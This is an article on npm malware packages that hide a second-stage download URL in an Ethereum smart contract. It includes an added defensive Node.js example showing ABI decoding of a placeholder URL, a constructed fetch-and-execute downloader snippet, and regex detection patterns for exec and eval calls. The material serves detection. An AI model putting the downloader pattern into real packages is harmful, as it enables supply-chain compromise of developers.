Threat actors have found a novel way to deliver malware, commands and links through Ethereum smart contracts, evading security scans as the tactics used against code repositories continue to evolve.
Researchers at ReversingLabs, a software supply chain security firm, have identified new malicious packages in the npm (Node Package Manager) registry, which hosts a vast array of JavaScript packages and libraries.
The packages use a new technique for staging their malware: smart contracts on the Ethereum blockchain. In a blog post published on Wednesday, the researchers described how two packages, colortoolsv2 and mimelib2, both published in July, used a smart contract to hide the malicious commands that installed downloader malware on affected systems.
To get past security scans, the packages act as simple downloaders: rather than embedding a malicious link, they retrieve the command-and-control server address indirectly from the smart contract, so a scanner that looks for hard-coded URLs in the package finds nothing. Once running, the package queries the blockchain to fetch the URL of the second-stage payload, which complicates detection because the query looks like legitimate blockchain traffic.
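As an added illustration (this is not code from ReversingLabs or from the packages described), the following Node.js script shows the mechanism in miniature: a URL hidden as the ABI-encoded string that a contract getter returns, the eth_call JSON-RPC exchange a downloader would use to recover it, and a static heuristic a reviewer can run over package source to flag the combination of an on-chain lookup with fetch-and-execute behaviour. The contract address, function selector, URL and code snippets are constructed placeholders; nothing here is taken from the real campaign.

```javascript
// Added example; not code from ReversingLabs or from colortoolsv2/mimelib2.
// Shows (1) how a URL is hidden as the ABI-encoded `string` a contract getter returns,
// (2) how a downloader recovers it from an eth_call JSON-RPC result, and
// (3) a static heuristic that flags package source combining an on-chain lookup
//     with fetch-and-execute behaviour. Runs offline on constructed data.

// ABI encoding of a dynamic `string` return value: word 0 is the offset of the
// data (0x20), word 1 its byte length, then the bytes right-padded to 32 bytes.
function encodeAbiString(str) {
  const bytes = Buffer.from(str, 'utf8');
  const padded = Math.ceil(bytes.length / 32) * 32;
  const out = Buffer.alloc(64 + padded);
  out.writeUInt32BE(32, 28);           // low 4 bytes of word 0: offset = 0x20
  out.writeUInt32BE(bytes.length, 60); // low 4 bytes of word 1: length
  bytes.copy(out, 64);
  return '0x' + out.toString('hex');
}

// Decode one ABI-encoded string from an eth_call `result`. Returns null on
// malformed input instead of throwing, so a scanner can apply it to arbitrary data.
function decodeAbiString(hex) {
  if (typeof hex !== 'string') return null;
  const buf = Buffer.from(hex.replace(/^0x/, ''), 'hex');
  if (buf.length < 64) return null;
  const offset = buf.readUInt32BE(28);
  if (offset + 32 > buf.length) return null;
  const len = buf.readUInt32BE(offset + 28);
  if (offset + 32 + len > buf.length) return null;
  return buf.subarray(offset + 32, offset + 32 + len).toString('utf8');
}

// Constructed JSON-RPC exchange (placeholder contract address and 4-byte selector;
// the URL uses a reserved example domain). A downloader of the kind described
// would POST `sampleRequest` to an Ethereum RPC endpoint and get `sampleResponse`.
const sampleRequest = {
  jsonrpc: '2.0',
  id: 1,
  method: 'eth_call',
  params: [{ to: '0x' + '11'.repeat(20), data: '0x12345678' }, 'latest'],
};
const sampleResponse = {
  jsonrpc: '2.0',
  id: 1,
  result: encodeAbiString('https://example.com/s2'),
};

// The package's own files never contain the stage-2 URL; only this decode step does.
function recoverStageUrl(rpcResponse) {
  return decodeAbiString(rpcResponse && rpcResponse.result);
}

// Review heuristic: an on-chain lookup alone is normal for dapp tooling, so only
// the combination with code execution is reported as suspicious.
const INDICATORS = [
  ['chain_lookup', /eth_call|JsonRpcProvider|web3\.eth|new Web3\(/],
  ['remote_fetch', /\bfetch\(|https?\.get\(|axios\.(get|post)\(/],
  ['exec_or_eval', /child_process|\bexec(Sync)?\(|\bspawn(Sync)?\(|\beval\(|new Function\(/],
  ['install_hook', /"(pre|post)install"\s*:/],
];

function scanPackageSource(source) {
  const hits = INDICATORS.filter(([, re]) => re.test(source)).map(([name]) => name);
  return {
    hits,
    suspicious: hits.includes('chain_lookup') && hits.includes('exec_or_eval'),
  };
}

// Constructed snippets: a normal dapp balance check versus a downloader-like flow.
const benignDapp =
  "const p = new ethers.JsonRpcProvider(RPC); const b = await p.getBalance(addr);";
const downloaderLike = `
  const r = await fetch(RPC, { method: 'POST',
    body: JSON.stringify({ method: 'eth_call', params: [{ to: C, data: S }, 'latest'] }) });
  const url = decode((await r.json()).result);
  const bin = Buffer.from(await (await fetch(url)).arrayBuffer());
  require('child_process').execSync(dropAndRun(bin));`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log('recovered URL:', recoverStageUrl(sampleResponse));
  console.log('benign dapp:', scanPackageSource(benignDapp));
  console.log('downloader-like:', scanPackageSource(downloaderLike));
}
```

The heuristic is deliberately conservative: a package that only talks to an RPC endpoint is common in the Ethereum ecosystem, so the signal worth triaging is the pairing of that lookup with a download that is then handed to child_process or eval, ideally inside an install hook. In practice a reviewer would run the same check over the package's install scripts and any minified or obfuscated files, since a string like eth_call may itself be assembled at runtime.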
New attack vector
Malware that uses Ethereum smart contracts is not new; the North Korea-linked Lazarus Group has used them before. What stands out here is the use of a smart contract to locate and download a second-stage payload. ReversingLabs threat researcher Lucija Valentić said the approach is unprecedented and shows how quickly the evasion techniques of actors targeting open-source repositories and developers are advancing.
“It’s something we’ve never seen before, highlighting the rapid evolution of detection evasion strategies by malicious actors trolling open-source repositories and developers.”
Elaborate Crypto-Case Campaign
The packages are part of a broader, elaborate social engineering campaign run mainly through GitHub. The attackers set up a fake cryptocurrency trading bot repository and gave it a veneer of credibility with fabricated commits, synthetic user accounts to inflate the repository's views, multiple maintainer accounts that simulate active development, and a professional-looking project description to attract interest.
Threat actors are evolving
Researchers documented 23 crypto-related malicious campaigns against open-source repositories in 2024, and this latest technique marks an evolution in the methods used against them. The attacks are not limited to Ethereum: in April, attackers distributed malware that stole crypto wallet credentials disguised as a Solana trading bot repository, and they also targeted users of bitcoinlib, an open-source Python library for Bitcoin development.
